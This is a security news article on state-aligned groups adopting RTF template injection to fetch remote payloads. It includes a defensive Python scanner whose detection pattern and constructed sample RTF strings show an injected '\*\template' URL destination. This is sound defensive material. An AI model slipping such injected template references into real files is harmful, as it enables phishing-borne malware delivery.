Cybercriminals Increasingly Adopting RTF Template Injection Technique

RTF template injection is a novel technique in which an RTF (Rich Text Format) file is altered so that, when it is opened, it retrieves content hosted at an external URL.

According to researchers at Proofpoint, adoption of this novel and easily implemented phishing attachment technique by APT groups is increasing. Several state-sponsored threat actors, including those aligned with China and Russia, have been observed using template injection as part of campaigns that deliver malware to targeted victims.

RTF template injection abuses the legitimate RTF template functionality. By subverting the plain-text document formatting properties of an RTF file, it causes the application to retrieve a URL resource instead of a file resource through RTF's template control word, letting a threat actor replace a legitimate file destination with a URL from which a remote payload is fetched.

In practice, the attacker only has to alter the RTF file's document formatting properties, specifically the document formatting control word in the "\*\template" structure, so that the file retrieves remote content from a specified URL instead of from an accessible local file destination.
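The control word abuse described above can be checked for mechanically: a legitimate "\*\template" destination is a local file path, so a destination that starts with a URL scheme or UNC prefix is the tell. The following scanner is an added example written for this article, not code from Proofpoint or from any tool the article mentions; the sample RTF strings are constructed, and the escape handling assumes the common `\uN?` fallback form.

```python
import re
from pathlib import Path

# Matches the {\*\template ...} destination group that the technique abuses.
TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\s*([^{}]*)\}", re.IGNORECASE)
HEX_ESCAPE = re.compile(r"\\'([0-9a-fA-F]{2})")     # \'hh hex escape
UNICODE_ESCAPE = re.compile(r"\\u(-?\d+)\s?\??")    # \uN followed by a '?' fallback
# A legitimate template destination is a local path; a URL or UNC path is the red flag.
REMOTE_PREFIX = re.compile(r"^(?:https?|ftp)://|^\\\\", re.IGNORECASE)


def decode_rtf_text(raw: str) -> str:
    """Resolve RTF escapes so an obfuscated destination compares like plain text.
    Assumption: the \\uN fallback character is '?' (the common case)."""
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), raw)
    text = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1)) % 65536), text)
    return text.replace("\\\\", "\\").strip()  # '\\' is an escaped backslash in RTF


def find_template_targets(rtf: str) -> list[str]:
    """Return every decoded \\*\\template destination found in the document."""
    return [decode_rtf_text(m.group(1)) for m in TEMPLATE_GROUP.finditer(rtf)]


def is_template_injection(rtf: str) -> bool:
    """True if any template destination points at a remote resource."""
    return any(REMOTE_PREFIX.match(t) for t in find_template_targets(rtf))


def scan_file(path: str) -> bool:
    """Scan an RTF file on disk; latin-1 decoding never fails on RTF's 7-bit body."""
    return is_template_injection(Path(path).read_text(encoding="latin-1"))


# Constructed samples (not real-world files): a benign local template, an injected
# URL hiding one character behind a \'hh escape, and one using a \uN escape.
BENIGN_RTF = r"{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}\pard Hello\par}"
INJECTED_RTF = r"{\rtf1\ansi{\*\template http://example.invalid/\'74emplate.dotm}\pard Hi\par}"
OBFUSCATED_RTF = r"{\rtf1\ansi{\*\template \u104?ttp://example.invalid/x.dotm}\pard Hi\par}"

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN_RTF), ("injected", INJECTED_RTF),
                         ("obfuscated", OBFUSCATED_RTF)]:
        print(f"{name}: targets={find_template_targets(sample)} "
              f"injection={is_template_injection(sample)}")
```

Decoding the escapes before matching matters because the destination string can be written with hex or Unicode escapes that a plain substring search for "http" would miss.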

How APT Threat Actors Are Adopting RTF Template Injection

APT groups believed to be affiliated with the state interests of India, Russia and China have all adopted RTF template injection, with template injection RTF files attributable to the DoNot Team, a group historically suspected of being aligned with Indian state interests.

RTF files attributable to a China-related APT group, targeting entities with ties to Malaysian energy exploration, were identified on September 29, 2021. Within the same initial adoption period, Gamaredon, an APT group believed to be linked to the Russian Federal Security Service (FSB), was observed on October 5, 2021 using RTF template injection files in phishing campaigns that targeted Ukrainian government entities with file lures.

While the use of malicious RTF content as a method for delivering malware has historically been well documented, this new technique is simpler and serves as a more effective method for remote payload delivery than previously documented techniques.

How to Safeguard Your Systems against RTF Template Injection

RTF template injection is poised for wider adoption in the threat landscape because of its ease of use and its relative effectiveness compared with other template injection-based phishing attachment techniques.

Therefore, organizations should take a defensive, reactive approach to their security and, most importantly, remain constantly vigilant, iterating on security procedures to ensure they are not caught off guard when new RTF template injection attacks are deployed against their defenses.
